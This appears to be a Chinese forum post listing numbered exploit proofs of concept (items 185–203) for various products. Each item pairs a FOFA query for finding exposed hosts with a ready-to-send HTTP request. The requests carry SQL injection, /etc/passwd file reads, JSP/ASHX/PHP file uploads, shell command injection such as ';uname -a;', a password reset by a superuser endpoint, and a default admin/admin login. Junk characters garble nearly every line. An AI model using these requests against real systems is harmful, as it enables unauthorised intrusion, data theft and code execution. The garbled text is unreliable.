4 R8 U) H# r$ F8 j5 ? f' ~! i1 ?$ e* f# l0 v. Q$ N- I6 h6 I
+ S* I. Z4 F$ Z
185. 瑞友天翼应用虚拟化系统SQL注入- `3 U @1 O5 _1 k' f9 G
version < 7.0.5.1
! ^: ^0 ]3 C' FFOFA:app="REALOR-天翼应用虚拟化系统"
* R+ `# y& I" H( N* o4 H. XGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
, u" Y, H" u) M! ^$ h Z, p$ @7 QHost: host. }0 L- x4 v! h. ~0 v( Z; Q
& u8 N( q# T2 Y& b9 u
2 i* ]" ?0 j# G( C0 u, e" z) g
186. F-logic DataCube3 SQL注入6 ?) d: o) O# E# X# D
CVE-2024-31750
4 A1 v; j4 X3 f3 ^+ u# U' t) B. EF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
" Y+ e" X4 I _$ Z5 Y: }FOFA:title=="DataCube3"
% q) L* _! V1 Z" R2 zPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1# `) y' M5 u0 o
Host: your-ip
# _: p# G) q( UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
& ?7 P) ?! @( L! C- DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
- ^: V: M" @; ?) hAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- O; Q6 D' G _3 r* @8 J
Accept-Encoding: gzip, deflate
. k; H1 W5 \7 t* m, M0 ^. f& ^Connection: close
' @6 P& i+ k2 T$ c, f, nContent-Type: application/x-www-form-urlencoded
" S& H( g4 x+ M5 v$ f9 j% c# N; T, F
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450: n& x8 O+ P9 L5 e( |- k
7 `5 Z* {, X2 C
6 x, S8 F; w, S. ?0 z. t ?$ x187. Mura CMS processAsyncObject SQL注入
3 ^% |( W, C( A/ H8 w) QCVE-2024-326402 I! E: [% i2 s1 a2 H
FOFA:"Mura CMS") V1 s7 Q2 Z9 J: E
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1! {- V. ?/ H+ F z, A
Host: your-ip
: n7 l1 ~- t. S) m( OContent-Type: application/x-www-form-urlencoded; n3 c1 _) ]+ Z
# F' N0 H, f8 u7 \3 _& ^$ i4 Y4 K$ `6 ]9 o& I/ p
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
- k \, g c" u% o3 Y% K3 N' u
" I) \! D$ X" ]' Z. v
& P, J; k2 h3 y( H P188. 叁体-佳会视频会议 attachment 任意文件读取
0 {8 C% J" @2 e; m! {+ f/ ^version <= 3.9.7
" |& [8 b4 r3 q9 ]FOFA:body="/system/get_rtc_user_defined_info?site_id"3 u" t; s O0 n
GET /attachment?file=/etc/passwd HTTP/1.10 h3 u( `6 |; _9 g5 {
Host: your-ip
2 ~& W5 H% n- r) l0 ?7 @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36& C9 x- t! k& |4 c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ \) H- `% y' R1 W- tAccept-Encoding: gzip, deflate
8 ] E8 R/ P( c6 M' R& @5 }Accept-Language: zh-CN,zh;q=0.9,en;q=0.82 X5 I* i% Q H+ z( e
Connection: close% Y- L E% a1 H2 f; a" E
, ~" T( A$ [& g1 t+ Q" l. [! l0 q' W$ ^; H0 V1 t2 r
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
! V1 d, b+ d T6 }" hFOFA:app="LANWON-临床浏览系统"7 u7 D: n: {9 A: K1 w3 ^5 p
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1- N V% c6 K6 s& H
Host: your-ip4 X" E7 `5 s2 [1 }* v; ?) p1 M
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36* t+ D8 W* t( `, J0 l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. X8 ~. }1 F4 k9 i5 `1 @1 \2 D( k" GAccept-Encoding: gzip, deflate
$ x( s) Y( _( p# K, l" ^Accept-Language: zh-CN,zh;q=0.9& u- @4 N# `: R
Connection: close+ x: L$ {1 \: T; U
. w; k! d+ e# a+ g, d, k5 F$ ]* l" m p: y( _( X1 ~
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
6 e" v4 ~( X' x' f5 {* p* t. @3 eFOFA:title=="短视频矩阵营销系统"
* O, x' c( u% k5 ^5 p' r2 aPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
6 X4 I1 f0 l( I; M- W1 rHost: your-ip
7 J/ v0 h3 Y1 B6 p2 {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36! D+ O0 S+ P6 h0 o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.97 z$ X8 [8 V$ o. ]' Z
Content-Type: application/x-www-form-urlencoded
' ]1 p L4 X* \; fAccept-Encoding: gzip, deflate
' J8 H1 d# G. BAccept-Language: zh-CN,zh;q=0.9+ c5 r" y. ]9 n
! d" }! }8 e/ j }5 G! B6 i- Spoi=file:///etc/passwd4 u0 Q# P' r, @: n0 m
0 j* P0 H7 T' q& i3 ^5 b+ C" k l8 l1 i# k8 J
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
" ~% ^4 |* s: H/ \4 W vFOFA:body="/CDGServer3/index.jsp", y( N F) T0 g( [! o$ K
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
3 ?. N' ^' O6 H9 fHost: your-ip& K8 X" D4 V, {5 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) R4 B1 Z3 C7 B. ~# ]
Content-Type: application/x-www-form-urlencoded
% K# g7 c( |2 l5 g9 V. T' _* l' i' e6 M, L' A8 n) W4 v9 A
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId= y3 K( d; O6 [: Y6 m7 R# v2 `
5 k+ v( z! K. s0 J! m% q, r3 v8 S$ u* i& ]
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传6 |$ H3 E$ Q, \6 u* ]
FOFA:title="用户登录_富通天下外贸ERP"
H1 O' I7 j0 t# g9 VPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
! [& d8 ~/ |( ^) v. S: dHost: your-ip
5 a' w8 j3 h$ [0 f7 }7 U1 u4 XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36& ?5 d- a" M8 T2 F# b8 d2 T
Content-Type: application/x-www-form-urlencoded! X9 Q8 t# w8 P& G5 L
& Y' z4 W$ F' u" _+ [0 ~
9 A% ~" P. V) w8 u+ u<% @ webhandler language="C#" class="AverageHandler" %>! C% W7 T; o, k5 b# C; p2 V$ i, Q
using System;% G" c4 o, w: o
using System.Web;7 F2 |6 M; _' J0 e; h1 E H
public class AverageHandler : IHttpHandler
' z1 ^* V3 Y0 [' o+ S5 s{: v) N9 _! G; G4 C# I- V
public bool IsReusable
! N: o+ D( V7 R9 e. ?! G{ get { return true; } }4 r, ? J# X2 j8 \0 V6 R+ {
public void ProcessRequest(HttpContext ctx)
7 e H9 n2 {: v v' [0 n2 X{% B% w% x% T+ u; f* S/ q* D* Z
ctx.Response.Write("test");
% R; ?. s3 W! n, R0 s}
+ a0 t, o8 S3 r* j7 i% u2 D+ Z* {}: T% K* H4 v0 O) I- q
. w: m; L* f: }
5 u% n0 G7 N7 u0 V$ T193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行6 Z0 M4 e# G+ k( C$ ]8 E3 e
FOFA:body="山石云鉴主机安全管理系统"& B) Q. v6 Y% ^/ n" r
GET /master/ajaxActions/getTokenAction.php HTTP/1.1' N& |0 M( u$ q" C' d5 X
Host:. p, J( U* ^3 J
Cookie: PHPSESSID=2333333333333;
1 H( w# `3 c; K" rContent-Type: application/x-www-form-urlencoded" z. G. {8 n; S; s) t- V
User-Agent: Mozilla/5.0
4 O7 K& N: p8 {" n) e% K6 G5 Y `+ F* S0 W- W6 |
S6 c$ l+ ?: N3 x0 W3 YPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1" u% S5 p$ M% z3 e: x+ @1 t
Host:
3 s0 n8 R0 }( lUser-Agent: Mozilla/5.0
! Q/ k* `/ N4 kAccept-Encoding: gzip, deflate. p a% M6 [: r% _8 e2 e
Accept: */*+ P9 `$ {' T# s: P0 t0 V" X
Connection: close
" s- G1 _2 v" O6 d8 [+ S4 ]Cookie: PHPSESSID=2333333333333;
9 `" K4 k! P! Y. }) BContent-Type: application/x-www-form-urlencoded# U6 n0 I2 Z# V" B! h
Content-Length: 844 u! |8 {( R1 ^& E4 h0 ?1 l' C
& ^# R' u1 Z# w9 p6 ?param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')9 }" t2 b: }+ o" t- a9 j
0 O& ~% g* U. E2 |, y5 H
( G3 X3 T& t& t. @4 Y3 u/ b" NGET /master/img/config HTTP/1.1! R& c D9 X6 x+ R) a O' W
Host:; K5 M( `2 o5 g! W7 c$ n
User-Agent: Mozilla/5.0
) a; e# I( ~% g9 N! f
, V* T4 h! {) q
2 Z2 P, n' {/ D7 m/ {9 X* [194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传2 z2 F6 W9 f* V8 h8 ~! B
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
& g/ e7 D% W! |% C( ]: l
0 @: I( V: I& D x2 T: U, zPOST /servlet/uploadAttachmentServlet HTTP/1.1
5 ^8 R/ g. R. e) `( UHost: host- Z, \7 @1 P! j, ~* R$ B7 i3 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36: R; y+ w. p3 k" q9 S4 `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# Z' h3 E4 F5 }4 c* Y& A0 u* P7 M
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 G: f* h* y) N' g& N( m) q& \
Accept-Encoding: gzip, deflate
9 S" b, n9 E' c/ G$ P: `. y1 XConnection: close# V8 q3 w# @2 [; c( ?
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
0 v4 u6 a& K9 D, I, _- ~% {------WebKitFormBoundaryKNt0t4vBe8cX9rZk" f; S: D+ i( u5 }5 F
2 X# p0 F2 b; j* r; F( h2 aContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"; ]1 V) M0 y1 C" Q, R4 k" @
Content-Type: text/plain
* G7 V) _, w) {<% out.println("hello");%>
~$ l4 [& I2 q% J/ ]5 n5 M------WebKitFormBoundaryKNt0t4vBe8cX9rZk
' C! A( H' Z8 L9 f, cContent-Disposition: form-data; name="json"" C [5 o$ L- _$ o8 G# O
{"iq":{"query":{"UpdateType":"mail"}}}
. y( J! g h8 T; C3 a------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
* E( Y2 {# e) y7 N& y& K* c- [4 x. E9 b. `) a! x9 r
7 ?$ U4 [7 g" `0 ?2 c% r+ M195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
! o9 X7 J8 l9 p2 WFOFA:title=="飞鱼星企业级智能上网行为管理系统6 `; s' u8 u. b
POST /send_order.cgi?parameter=operation HTTP/1.1
' W" m" v% e* u# b6 p# _Host: 127.0.0.1+ e/ p+ h2 \' j. \
Pragma: no-cache
@% \+ h' F1 Y' d4 ?Cache-Control: no-cache
1 d- V* I4 y; Y% p0 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36) j8 Z. L6 }+ Q! w& w$ W3 V2 R
Accept: */*
; h$ F' M" u4 l5 ^; T( p* ?- sAccept-Encoding: gzip, deflate, V8 q& j4 q- [# A1 u( Q& [; i; P
Accept-Language: zh-CN,zh;q=0.9* k2 o X/ N$ ?0 C3 l8 {
Connection: close% a+ w, n/ I7 X
Content-Type: application/x-www-form-urlencoded
' q) q4 e$ k9 A0 eContent-Length: 68- c6 W! @2 t0 N2 X4 D3 z
3 u% Y+ S k* q& g: a5 r" B
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}0 {* I) x. r" E: t& Q8 j
2 f$ Q+ Y" ?; k6 b! R( S! d3 A0 e9 J* N. S9 f/ {
196. 河南省风速科技统一认证平台密码重置
% V( N$ f1 T; l$ E* F. OFOFA:body="/cas/themes/zbvc/js/jquery.min.js"' l0 ]8 N. G5 X3 e( [8 T
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1) c6 T' r* U( l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36% L- N3 d* _. @9 E; [- F
Content-Type: application/json;charset=UTF-8
6 a8 _4 k5 x7 h$ _- ZX-Requested-With: XMLHttpRequest
* K, E8 e* j. ^* q6 d8 i5 KHost:
% v& Z ~4 x( dAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
8 L0 A) h! c7 {. R! W3 I. DContent-Length: 458 X# s' z- m+ f& _) N
Connection: close
& R; E; s, f) |1 D( T3 X. _* N I" P V
{"xgh":"test","newPass":"test666","email":""}
1 y x9 Q- `; R" O
- I" E# [1 n* Y) J4 r+ a
: r/ V7 j9 z+ K2 {4 K6 m
/ ?, \& u& F. G1 y- r$ S% Y. P197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
* Q" _7 r6 W; ]% D9 t gFOFA:app="浙大恩特客户资源管理系统"
4 O9 p( F5 M3 @9 ^9 iGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
3 n- k8 S. N0 `: N* f8 RHost:
; X2 V" k% Y g2 Y$ J' Q* X1 CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
8 s4 _- C) x# t! ?Accept-Encoding: gzip, deflate+ ]: m8 t0 s: _8 U, s
Connection: close
h' _ [+ x0 G2 P
. F9 ~; K7 p' z! o \7 G. p4 P W; ~. W
7 H+ P2 ~7 o0 J1 Z198. 阿里云盘 WebDAV 命令注入+ `" |$ L2 E( Y, H4 S9 J
CVE-2024-296403 ~( P5 m! F- v! E6 H! Q/ T9 V
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
" J0 u# D+ [0 [; K w/ fCookie: sysauth=41273cb2cffef0bb5d0653592624cf64
) s& {5 f: R" w& U6 j" [, ~+ SAccept: */*
% g4 H [+ B4 x4 _- yAccept-Encoding: gzip, deflate
3 c6 j @2 r' ~' i, mAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
$ B/ x8 a; R2 B1 M$ [2 p* jConnection: close
4 V* e$ l5 l- A! ~ w
) |) J" Q% f( |, I. W, R: u- }3 k4 f1 }9 F1 p6 a
199. cockpit系统assetsmanager_upload接口 文件上传
7 N" L# q" F" E2 V
& i) f+ g4 _5 e$ |$ y) V1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
( B1 Y$ G) X. N$ EGET /auth/login?to=/ HTTP/1.1+ W8 P! [9 J4 s1 f! `% t& s5 A
8 `! C Z! B, l& g响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"9 j6 l& f+ j5 C; ]2 k5 z& J
" t* R1 K3 |; o+ F* [" G+ a
2.使用刚才上一步获取到的jwt获取cookie:
# Z/ \0 r/ V" W0 U( o4 z$ P* [) O8 H4 C, t; A6 `2 i
POST /auth/check HTTP/1.17 [! M- Z: a1 _
Content-Type: application/json# }/ z5 g7 h- E+ o- S
9 [& }' O! a, p' @% ]& |: F{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}; s* O& l# q( ? g6 o
; @" C& o1 c9 @
响应:200,返回值:
7 S" S& c1 O! ?2 w& [# j4 lSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
# {: B. |+ A, AFofa:title="Authenticate Please!"- N" R! b( Y6 r j) G9 G4 Z
POST /assetsmanager/upload HTTP/1.1) I& @/ b9 c r3 i. Z w" q" J
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
- Y# e$ m' M4 X# W6 P/ J' _1 LCookie: mysession=95524f01e238bf51bb60d77ede3bea92
+ y0 v3 W* g, j8 L
& L& c( L1 s1 b# J) [-----------------------------36D28FBc36bd6feE7Fb3
1 B; |2 k) G! S. M& DContent-Disposition: form-data; name="files[]"; filename="tttt.php". U( B; S$ P+ X) c' z5 z
Content-Type: text/php
' {4 n0 u) Y n( V. f9 P' W& U* `4 k6 S* d0 K2 j) H# b. V. e
<?php echo "tttt";unlink(__FILE__);?>0 `: W0 U) j. K3 x
-----------------------------36D28FBc36bd6feE7Fb3& X& l/ @0 Z! g& F' T
Content-Disposition: form-data; name="folder"+ D4 d; z& }3 [0 n. T, m% k6 Q2 u
2 C- U6 k6 G$ j- q0 O-----------------------------36D28FBc36bd6feE7Fb3--; f7 g( B+ k+ Q1 P. L9 g" _
3 P7 h% f- O- \' z u" L/ j/ N
$ J* a% @3 V: O# A7 U
/storage/uploads/tttt.php* H9 h% A+ y5 @* ]; o0 ]
# U+ S) g3 V3 g1 P% e
200. SeaCMS海洋影视管理系统dmku SQL注入
4 G9 O8 c) X; n: PFOFA:app="海洋CMS"" w' A, G% b5 B8 A$ Z2 `, R
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
0 t, t9 h2 v5 aCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
3 I! J0 o- Q9 q; _) ^7 dUpgrade-Insecure-Requests: 1
3 B& c9 }3 u$ @2 a9 k5 C% VCache-Control: max-age=0
/ l2 }0 `4 Q9 {3 J' nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) y* ?6 I; f& T& d4 C$ k& g DAccept-Encoding: gzip, deflate
! s$ S$ u9 @8 d: yAccept-Language: zh-CN,zh;q=0.94 K5 i5 ~! Q# H+ O
# T7 `2 x* x5 R) u
" C5 H& @ M( _2 S& [201. 方正全媒体新闻采编系统 binary SQL注入
) P% i/ E1 X' @" T# X$ GFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
: D& g% S5 `& _2 r& J/ \7 xPOST /newsedit/newsplan/task/binary.do HTTP/1.1
' _8 a* f$ p- T, t8 U) |Content-Type: application/x-www-form-urlencoded
9 e) _+ V/ \2 s+ }1 O& X CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* r/ _. b: S$ N3 @& v' u' y
Accept-Encoding: gzip, deflate
* j0 `- ` A O6 W# OAccept-Language: zh-CN,zh;q=0.9
+ n4 Z6 G2 ]. ~3 F K$ zConnection: close
2 e7 D* T3 E. d! o' Y/ Y& K
8 _- E& q4 E( Z( k+ F8 V3 LTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
3 M- x J, n. `
) ?; \2 V* t3 w
! ^1 }, b. \! o: ` U- H202. 微擎系统 AccountEdit任意文件上传! t4 k! H4 B7 z9 I
FOFA:body="/Widgets/WidgetCollection/": ?4 L# H @* Q
获取__VIEWSTATE和__EVENTVALIDATION值
' W9 V# h# i8 n, ]0 k/ j% v+ |GET /User/AccountEdit.aspx HTTP/1.1
: N7 p; L( K$ V& R, jHost: 滑板人之家1 F3 n9 Z, b9 ~9 Z2 c8 g+ A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.313 ? h- M( y- h- _1 o
Content-Length: 0
* s- F' _/ \. ]4 l. q8 I0 I. Y8 Q8 r2 K+ x
" m! |1 e* m- t' z) f* }1 u8 O. n
替换__VIEWSTATE和__EVENTVALIDATION值# ?, L4 M- T& q1 D I* L
POST /User/AccountEdit.aspx HTTP/1.1) d+ r; e2 J7 W+ B" R
Accept-Encoding: gzip, deflate, br/ E7 H5 a8 n$ t) U. W; t. h4 [
Content-Type: multipart/form-data;boundary=---------------------------786435874t385875938657365873465673587356873 w9 h) h/ N. L% y
7 }) X( r# N5 Q* a4 Z-----------------------------786435874t38587593865736587346567358735687- m0 e7 c1 ]2 E. e3 s
Content-Disposition: form-data; name="__VIEWSTATE"
! _% U1 @% q: _+ o( @0 e& H+ p: l% H# ~' S2 r5 f3 M, P
__VIEWSTATE! `; j! n5 a+ M$ r* X3 p# S+ C C
-----------------------------786435874t38587593865736587346567358735687
. J# Z2 p, m6 d/ |Content-Disposition: form-data; name="__EVENTVALIDATION"2 \3 @* _4 ?- |/ i3 E* o- Y
; d. |" j. |; z/ t6 P! C
__EVENTVALIDATION) l; U6 ~! R, u
-----------------------------786435874t38587593865736587346567358735687
4 T; Z: A: ^! \Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
7 T+ A5 p) z4 x$ \3 i( B4 ZContent-Type: text/plain1 g9 e, \2 | w3 G0 q# R
! U0 P4 Y' R* ~6 p# T/ wHello World!# ~0 P1 n/ t& h$ ~4 w9 O
-----------------------------786435874t385875938657365873465673587356871 K( a' q, S+ Y7 X' V5 }% h
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"0 {$ y4 m5 Q h* m
; Y: P2 B3 A1 p3 S& x8 [
上传图片% w! n$ Y: g% B% d7 q/ G
-----------------------------786435874t385875938657365873465673587356879 i$ L3 f" C/ T4 A" b+ M$ }1 N/ u
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
8 Q+ ~4 h, }) t
% L$ W4 p6 x, {- Q7 T* X' u* G: r0 M7 d& r, L5 T8 z
-----------------------------786435874t38587593865736587346567358735687
# _8 ~. k. H4 B3 lContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"( a. G- L4 m7 b8 u7 s3 F
7 ~- Z4 o- c0 W0 o _) ~
$ f+ t/ x1 Z) a. o9 I) |-----------------------------786435874t38587593865736587346567358735687--
6 r, {. Y L! [3 r& s7 q
/ M6 ~) G5 L" T
# x8 m9 V4 z' n, B0 ]# h" b/_data/Uploads/1123.txt
]7 J4 F* P( {0 E6 X$ c. c$ P3 L t V7 X) [. z
203. 红海云EHR PtFjk 文件上传$ F7 `8 S' O- {% F& f
FOFA:body="RedseaPlatform"
9 W8 d" R! b) dPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1; @) s* L4 V* S1 }
Host: x.x.x.x
: f; r. v6 \: w I- K, tAccept-Encoding: gzip
# p6 ~) R$ D4 l' H8 `* s, EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 ^2 z- b5 {- x3 AContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys47 ~2 ^2 R! v h; Q6 s( M Q
Content-Length: 2101 U7 C2 \, h8 \5 E4 v, T" c6 l
0 Y" c8 y' q" P- X% ^
------WebKitFormBoundaryt7WbDl1tXogoZys4
0 C4 X- `2 M, r3 l7 S1 EContent-Disposition: form-data; name="fj_file"; filename="11.jsp"" u' c8 w. |: d6 ~ z
Content-Type:image/jpeg
/ Q5 u, e5 V$ l* K
- P; S4 N: ^4 n5 `. D+ p<% out.print("hello,eHR");%>
. k' [- Q+ q5 b0 F9 v/ E------WebKitFormBoundaryt7WbDl1tXogoZys4--
- f1 N& I: `4 C3 W+ U+ E# N2 ]1 o" H; g- f7 G2 [
" \, Y4 L4 T/ i4 [5 G
% o0 `/ h b6 X) |* w; l' U8 G
d9 F6 {% L7 R' i: C
! \! }* Y% A# U7 `' B- D+ q
% B7 {) T5 w" Q& m
|
发表于 2024-6-5 14:31:29
收藏
支持
反对